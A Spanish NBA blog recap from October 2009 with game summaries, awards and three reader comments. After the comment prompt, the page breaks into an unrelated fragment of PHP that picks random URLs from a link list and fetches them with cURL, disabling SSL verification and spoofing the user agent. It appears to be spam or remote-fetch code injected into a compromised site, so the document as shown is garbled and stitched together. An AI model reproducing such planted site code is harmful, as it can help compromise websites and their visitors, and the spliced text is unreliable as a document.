La minicrónica (30/10/2009)

31 de October de 2009 por Viva_Dirk

Anoche se disputaron nada menos que 13 encuentros, un buen chute para nuestra sed de NBA. Eso sí, los fines de semana tenemos a buena parte del personal de TJNBA descansando así que salvo algun dia en el que nos venga la inspiración, durante los sábados y domingos nuestras crónicas serán mas escuetas que entre semana. Pero pongámonos manos a la obra:

Primera derrota de los Lakers con un pésimo partido de Fisher y Artest acompañado de bajos porcentajes de la mayoría del equipo. Por su parte, los Mavs vieron como MarionTerry acompañaban a Nowitzki en el apartado anotador y el resto cumplía perfectamente sus tareas.

Paliza de Boston a Chicago, puede que para cobrarles el sufrimiento de los pasados play-offs. Los verdes aprovecharon su superioridad y pudieron dar descanso a todos sus jugadores no jugando ninguno más de 32 minutos. En los Bulls pésimo dia desde la linea de 3 y casi tantas pérdidas como asistencias.

El duelo español entre Raptors y Grizzlies se lo llevó Marc Gasol, que acabó con 19 puntos en 25 minutos, mientras Jose Calderón alcanzaba los 15 puntos pero sólo 3 asistencias. Sorprendente partido de los de Memphis que movieron bien el balón y mal partido en defensa de los Raptors.

Los subcampeones ganaron a los Nets con solvencia pero estan a la espera de la gravedad de la lesión de Vince Carter. Partido demoledor de Dwight Howard y buen acompañamiento de ‘los blanquitos’ Anderson y Redick.

Por su parte, Cleveland consiguió por fin su primera victoria de la temporada antes los Wolves. 24-9-6 para King James, bien secundado por Mo Williams e Ilgauskas.

Y resumiento el resto de la jornada: los Sixers ganaron a los Bucks liderados por Iguodala, los Bobcats a los Knicks tras dos prórrogas con Gerald Wallace jugando 53 minutazos, los Hawks a Wizards con Josh Smith a la cabeza, los Heat de Wade&Jermaine a los Pacers, Hornets a Kings con un Paul más anotador que pasador, Thunder a Pistons con 25-12 de Durant, Jazz a Clippers en un buen duelo de bases y Suns a Warriors donde Nash repartió más asistencias que todos los Warriors juntos.

PREMIOS

MVP: Actuaciones estelares de algunos de nuestros favoritos para el MVP de la temporada, como los 31 puntos de C.Paul, los 32 puntos de D.Wade o el dominio de D.Howard con 20 puntos y 22 rebotes (aunque parece que esta pasándolo mal desde la línea, 4/11 en tiros libres). Pero vamos a quedarnos con un viejo rockero, uno de nuestros favoritos, Steve Nash, que ha empezado fantásticamente bien el año y anoche nos dejó 18 puntos, 20 asistencias y 6 rebotes en la victoria de los Suns sobre los Warriors

Rookie: Buenos partidos de tres bases novatos. J.Flynn con 17 puntos y 3 asistencias y T.Evans 22 puntos cuajaron una buena actuación pero vamos a quedarnos con B. Jennings que rozó el triple doble con 17 puntos, 9 rebotes y 9 asistencias.

Sorpresa: Algunos lo dábamos por perdido pero esta temporada parece empeñado en demostrar lo contrario. Jermaine O´Neal ha empezado el año de una manera espectacular dejándonos ayer  22 puntos y 12 rebotes.

Decepción: Pues para muchos la primera derrota de los Lakers será la gran decepción de la noche, pero vamos a quedarnos con uno de los “nuestros”. 14 segundos de juego para Sergio Rodriguez en su segundo partido. Mala pinta tiene esto para el canario.

Esfuerzo en vano: Gran partido de C.Bosh con 37 puntos, 12 rebotes, 4 asistencias y 2 tapones que no sirvieron par derrotar a los ositos.

Comenta

3 comentarios a esta entrada

  1. aro_pasado_no_newtoniano dice:
    #1

    Reddick jugó bien?? ¿qué oigo?

    Joer,, Nash 20 asst,,que pueden ser desde 40 hasta 80 puntos….

    Pobre Marc en lo que he visto de su partidete. Debe ser como ser donante,, y subir al ascensor,,que pare en el cuarto y se te meta 4 testigos de Jehová.

      Citar

  2. HeiNeKeN dice:
    #2

    Espero que lo de Vince Carter no sea nada y se recupere pronto… por que cuantos partidos le quedan de sancion a Lewis??

    Lo de Nash es increible, seria un pena que se retirase sin anillo…

      Citar

  3. Love Denise dice:
    #3

    Lewis está sancionado 10 partidos, por lo que le quedan 8 para volver a jugar.
    Respecto a lo de Nash y que se retire sin el anillo, a mi parecer, ha pensado más en los $$$$$ que en el anillo, si no, no me explico la renovación por los Suns (dudo que puedan formar un gran equipo en 3 años).

    Respecto a lo de Marc, sinceramente no vi a los Mayo, Gay y Randolph tan chupones ayer, si siempre jugarán así, tendrían sus opciones (pocas, pero algunas) de luchar por la última plaza del oeste. Eso sí, partidazo de Marc, y de OJ Mayo en los últimos 3 minutos.

    Respecto a mis Magic, sigo pensando que tienen la mejor plantilla, y si Redick y Anderson empiezan a explotar……

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>